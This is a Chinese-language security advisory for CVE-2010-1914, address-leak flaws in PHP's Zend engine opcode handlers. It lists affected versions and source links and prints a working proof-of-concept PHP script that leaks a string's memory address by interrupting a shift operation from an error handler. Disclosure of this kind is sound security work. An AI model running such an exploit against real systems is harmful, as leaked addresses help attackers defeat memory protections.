发布日期：2010-05-12
更新日期：2010-05-14

受影响系统：

PHP PHP <= 5.3.2
PHP PHP <= 5.2.13

描述：

---

CVE ID: CVE-2010-1914

PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。

PHP的Zend引擎中存在多个信息泄露漏洞，攻击者可以通过中断ZEND_BW_XOR opcode（shift_left_function）、ZEND_SL opcode（bitwise_xor_function）或ZEND_SR opcode（shift_right_function）的处理器导致泄露地址信息。

<*来源：Stefan Esser （s.esser@ematters.de）
  
  链接：http://www.php-security.org/2010/05/08/mops-2010-016-php-zend_sr-opcode-interruption-address-information-leak-vulnerability/index.html
        http://www.php-security.org/2010/05/08/mops-2010-015-php-zend_sl-opcode-interruption-address-information-leak-vulnerability/index.html
        http://www.php-security.org/2010/05/08/mops-2010-014-php-zend_bw_xor-opcode-interruption-address-information-leak-vulnerability/index.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php

/* This will leak the Address of the string "I AM THE SHELLCODE. SERIOUSLY..." in memory */

error_reporting(E_ALL);

/* Initialize */
$a = 1;
$b = new stdClass();

/* Setup Error Handler */
set_error_handler("my_error");
    
/* Trigger the Code */
$addr = $a << $b;
$addr >>= 1;

restore_error_handler();

echo sprintf("%016x\n", $addr);
sleep(1);

function my_error()
{
    $GLOBALS['a'] = "I AM THE SHELLCODE. SERIOUSLY...";
    return 1;
}
?>

建议：

---

厂商补丁：

PHP
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.php.net

浏览次数：2088
严重程度：0（网友投票）